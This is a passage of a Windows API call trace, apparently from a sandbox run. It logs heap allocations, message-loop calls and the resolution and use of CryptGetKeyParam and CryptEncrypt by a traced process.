(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0081.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0081.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0081.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0081.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0081.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0081.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0081.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0081.760] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0081.760] CryptGetKeyParam (in: hKey=0x41ac040, dwParam=0x7, pbData=0x43e2a30, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a30*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0081.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.762] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0081.762] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0081.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0081.763] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0081.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0081.763] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0081.763] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.763] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.763] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3590, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0081.764] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x16ee0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x16ef0) returned 1 [0081.764] CharLowerBuffW (in: lpsz="byte[93937]", cchLength=0xb | out: lpsz="byte[93937]") returned 0xb [0081.853] TranslateMessage (lpMsg=0x144e6a4) returned 0 [0081.853] DispatchMessageW (lpMsg=0x144e6a4) returned 0x0 [0081.853] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0081.853] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0081.853] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0081.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0081.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0081.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0081.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0081.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0081.853] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3620 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0081.854] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0081.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0081.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 